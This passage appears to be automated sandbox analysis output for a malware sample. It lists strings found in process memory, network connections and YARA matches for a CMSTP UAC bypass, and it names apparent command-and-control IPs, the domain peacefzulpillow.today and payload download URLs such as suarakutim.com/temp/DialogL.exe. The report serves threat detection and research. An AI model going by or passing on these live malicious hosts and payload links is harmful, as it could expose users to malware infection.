Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                  Source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps09
                  Source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350090833.0000000001EDA000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348837134.0000000001ED4000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2347818479.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418905518.000000000BF98000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2419793519.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2422657051.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420344626.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423093748.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa04
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2509465588.000000000338A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
                  Source: explorer.exe, 00000012.00000003.2509124770.0000000003384000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2509465588.000000000338A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
                  Source: explorer.exe, 00000012.00000002.3675598739.000000000335F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2504610783.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valicert.com/1
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
                  Source: explorer.exe, 00000012.00000002.3675598739.000000000335F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x.ss2.us/x.cerZr
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                  Source: Set-up.exe, 00000001.00000003.1837971893.000000000425D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                  Source: Server.exeString found in binary or memory: http://xml.org/sax/features/external-general-entities
                  Source: Server.exeString found in binary or memory: http://xml.org/sax/features/external-parameter-entities
                  Source: Server.exeString found in binary or memory: http://xml.org/sax/properties/lexical-handler
                  Source: Server.exe, 0000000C.00000002.2383984278.0000000000B7E000.00000002.00000001.01000000.0000000B.sdmp, Server.exe, 0000000F.00000002.2450483452.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://xml.org/sax/properties/lexical-handlerhttp://xml.org/sax/features/external-parameter-entities
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C8000.00000004.00001000.00020000.00000000.sdmp, K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://147.45.196.157:443
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C6000.00000004.00001000.00020000.00000000.sdmp, K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C8000.00000004.00001000.00020000.00000000.sdmp, K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://193.187.172.163:443
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://193.187.172.163:443$
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C6000.00000004.00001000.00020000.00000000.sdmp, K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://193.187.172.163:443https://46.8.232.106:443
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://46.8.232.106:443
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C8000.00000004.00001000.00020000.00000000.sdmp, K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://91.212.166.91:443
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034C8000.00000004.00001000.00020000.00000000.sdmp, K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3677933054.00000000034CE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://91.212.166.9:443
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                  Source: Set-up.exe, 00000001.00000003.1870853360.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                  Source: Set-up.exe, 00000001.00000003.1870853360.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: Set-up.exe, 00000001.00000003.1870853360.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                  Source: Set-up.exe, 00000001.00000003.1870853360.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
                  Source: more.com, 0000000D.00000002.2471707337.0000000005770000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3670818846.00000000004A1000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: https://data-seed-prebsc-1-s1.binance.org:8545/RtlDosPathNameToRelativeNtPathName_U_WithStatushttp:
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                  Source: Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: explorer.exe, 00000012.00000002.3693450265.0000000026707000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                  Source: Set-up.exe, 00000001.00000003.1923432107.0000000003D6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peacefzulpillow.today/
                  Source: Set-up.exe, 00000001.00000003.2018409901.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2018169072.0000000003D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peacefzulpillow.today/9
                  Source: Set-up.exe, 00000001.00000003.2018409901.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2018169072.0000000003D75000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1951297788.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1952968501.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1923432107.0000000003D6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peacefzulpillow.today/C
                  Source: Set-up.exe, 00000001.00000003.1872080300.0000000003D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peacefzulpillow.today/Kdzw
                  Source: Set-up.exe, 00000001.00000003.1837200470.0000000003D75000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1839066654.0000000003D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peacefzulpillow.today/Kdzw4m#
                  Source: Set-up.exe, 00000001.00000003.1951297788.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1952968501.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1923432107.0000000003D6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peacefzulpillow.today/Kdzwe
                  Source: Set-up.exe, 00000001.00000003.1899319162.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1951297788.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1952968501.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1923432107.0000000003D6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peacefzulpillow.today/Kdzwefm
                  Source: Set-up.exe, 00000001.00000003.1899319162.0000000003D73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peacefzulpillow.today/Kdzwejma
                  Source: Set-up.exe, 00000001.00000003.1809850617.0000000003D74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peacefzulpillow.today/c
                  Source: Set-up.exe, 00000001.00000003.1870812910.0000000003D74000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870963563.0000000003D74000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1871348179.0000000003D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peacefzulpillow.today/h
                  Source: Set-up.exe, 00000001.00000003.2018409901.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2018169072.0000000003D75000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1951297788.0000000003D73000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1952968501.0000000003D78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1923432107.0000000003D6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peacefzulpillow.today/z
                  Source: Set-up.exe, 00000001.00000003.2018283458.0000000003D4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2018514152.0000000003D57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://peacefzulpillow.today:443/Kdzw
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://repository.tsp.zetes.com0
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                  Source: explorer.exe, 00000012.00000003.2508670934.0000000026788000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
                  Source: Set-up.exe, 00000001.00000003.1870853360.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
                  Source: explorer.exe, 00000012.00000003.2509532860.0000000026712000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
                  Source: explorer.exe, 00000012.00000003.2508603714.00000000267B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                  Source: explorer.exe, 00000012.00000003.2508603714.00000000267B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                  Source: Set-up.exe, 00000001.00000003.1870853360.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1870697470.0000000003DFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                  Source: Set-up.exe, 00000001.00000003.1780229012.0000000003D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                  Source: Set-up.exe, 00000001.00000003.2110639894.0000000003D58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mediafire.com/file_premium/tgt65hk2h8vsbrn/skeletal.bin/file
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: Set-up.exe, 00000001.00000003.1839103023.0000000004474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: explorer.exe, 00000012.00000003.2508413739.00000000267B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                  Source: explorer.exe, 00000012.00000003.2509327264.000000000336C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.netlock.net/docs
                  Source: Set-up.exe, 00000001.00000003.2018092532.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2102473180.0000000003DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.suarakutim.com/temp/DialogL.exe
                  Source: Set-up.exe, 00000001.00000003.2018092532.0000000003DFF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2102473180.0000000003DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.suarakutim.com/temp/DialogL.exe2
                  Source: Set-up.exe, 00000001.00000003.2102508777.00000000015A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.suarakutim.com/temp/DialogL.exe3
                  Source: Set-up.exe, 00000001.00000003.2018092532.0000000003DFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.suarakutim.com/temp/DialogL.exer
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49723 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49725 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49726 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.72.2:443 -> 192.168.2.4:49728 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 191.101.230.18:443 -> 192.168.2.4:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.17.151.117:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.18.36.145:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416Jump to dropped file

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 18.2.explorer.exe.50a9b57.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 18.2.explorer.exe.50aa757.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 15.2.Server.exe.b278901.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.Server.exe.b3c7901.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 13.2.more.com.483db57.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 23.2.Server.exe.b4195ce.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 16.2.more.com.4465a8a.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 23.2.Server.exe.b3d3901.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.Server.exe.b40c9ce.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 15.2.Server.exe.b2bd9ce.21.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 16.2.more.com.44ab757.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 13.2.more.com.47f8a8a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.Server.exe.b40d5ce.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 23.2.Server.exe.b4189ce.21.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 15.2.Server.exe.b2be5ce.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 18.2.explorer.exe.5064a8a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 13.2.more.com.483e757.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 16.2.more.com.44aab57.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_009CE540: GetFileAttributesW,CreateFileW,DeviceIoControl,CloseHandle,wcsncmp,?assign@?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@PBG@Z,GetLastError,CloseHandle,15_2_009CE540
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_0047B28012_2_0047B280
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_0047B5F012_2_0047B5F0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_0043F80012_2_0043F800
